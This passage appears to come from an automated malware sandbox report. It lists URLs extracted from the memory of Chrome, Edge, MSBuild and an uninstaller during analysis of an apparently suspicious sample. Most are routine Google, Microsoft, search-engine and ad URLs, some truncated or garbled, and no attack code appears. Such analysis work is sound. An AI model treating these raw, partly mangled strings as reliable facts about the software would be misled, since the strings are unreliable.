Source: chrome.exe, 00000005.00000003.2557055529.000077B000F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2557425882.000077B0010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2557464993.000077B000F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2557542950.000077B001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2557250823.000077B001054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2564765950.000077B001148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2564873478.000077B00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2563966572.000077B000F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2563914325.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2633985133.000077B0002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2564602281.000077B00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2563878941.000077B000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2563845654.000077B000C90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000005.00000003.2557055529.000077B000F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2557425882.000077B0010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2557464993.000077B000F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2557542950.000077B001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2557250823.000077B001054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2564765950.000077B001148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2564873478.000077B00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2563966572.000077B000F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2563914325.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2633985133.000077B0002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2564602281.000077B00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2563878941.000077B000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2563845654.000077B000C90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000005.00000002.2637632737.000077B000988000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000005.00000002.2637812948.000077B0009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: unins000.exe, 00000000.00000002.2404445235.0000000003A01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 00000005.00000002.2637812948.000077B0009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000005.00000002.2637812948.000077B0009E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/6
Source: chrome.exe, 00000005.00000002.2638012665.000077B000A40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: MSBuild.exe, 00000003.00000002.2907711140.0000000004008000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638747506.000077B000C0C000.00000004.00000800.00020000.00000000.sdmp, pzus2d.3.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000005.00000002.2632852975.000077B0000AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2553030285.000077B000454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2554542827.000077B000454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596462357.000077B000454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2634875658.000077B000454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551758279.000077B000454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635184165.000077B0004D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2564602281.000077B000454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2577203204.000077B000454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2555806618.000077B000454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2632279648.000077B000014000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/:
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000005.00000003.2552682813.000077B000C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2553786717.000077B000C20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000005.00000003.2563151785.000077B000294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000005.00000003.2563151785.000077B000294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000005.00000002.2632896684.000077B0000C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000005.00000002.2632896684.000077B0000C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000005.00000002.2632896684.000077B0000C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000005.00000002.2632852975.000077B0000AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chromecache_156.7.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000005.00000002.2633601124.000077B00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com2bi
Source: chrome.exe, 00000005.00000002.2633509284.000077B0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000005.00000003.2581112755.000077B00180C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830e
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320s
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000005.00000003.2552841042.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2552884517.000077B000B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2551593266.000077B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685986290.000041B000378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2685925334.000041B00038C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: msedge.exe, 00000009.00000003.2710342311.000041B002118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.c
Source: msedge.exe, 00000009.00000003.2710342311.000041B002118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.c/auth/c.live.cogin.ine.P
Source: msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.cn/auth/cookie/silentpassport
Source: msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport
Source: chrome.exe, 00000005.00000003.2578513752.000077B00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2578226524.000077B001678000.00000004.00000800.00020000.00000000.sdmp, chromecache_156.7.dr, chromecache_151.7.dr String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000005.00000002.2644348727.000077B001A98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.iiHs4zUgbb0.O/m=gapi_iframes
Source: msedge.exe, 00000009.00000003.2713386891.000041B002CFC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com%22
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694769164.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694666000.000041B002A1C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694885968.000041B0006FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695418792.000041B002A68000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694841991.000041B002A28000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695338331.000041B002A80000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695295972.000041B0029B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bingretailmsndata.azureedge.net/msndata/
Source: MSBuild.exe, 00000003.00000002.2902111510.000000000154A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2902111510.000000000151E000.00000004.00000020.00020000.00000000.sdmp, cbaaa1.3.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: MSBuild.exe, 00000003.00000002.2902111510.000000000154A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2902111510.000000000151E000.00000004.00000020.00020000.00000000.sdmp, cbaaa1.3.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: chrome.exe, 00000005.00000002.2636545545.000077B00076C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2641022107.000077B000FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635334509.000077B000544000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000005.00000002.2638747506.000077B000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: MSBuild.exe, 00000003.00000002.2907711140.0000000004008000.00000004.00000020.00020000.00000000.sdmp, pzus2d.3.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2722651590.000041B002224000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2715801984.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2720393610.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2709257255.000041B002220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2688058069.000041B002229000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: MSBuild.exe, 00000003.00000002.2907711140.0000000004008000.00000004.00000020.00020000.00000000.sdmp, pzus2d.3.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000005.00000002.2638526528.000077B000B80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000005.00000002.2638526528.000077B000B80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000005.00000002.2638526528.000077B000B80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000005.00000002.2635956775.000077B000658000.00000004.00000800.00020000.00000000.sdmp, pzus2d.3.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msedge.exe, 00000009.00000003.2703973284.000041B000670000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
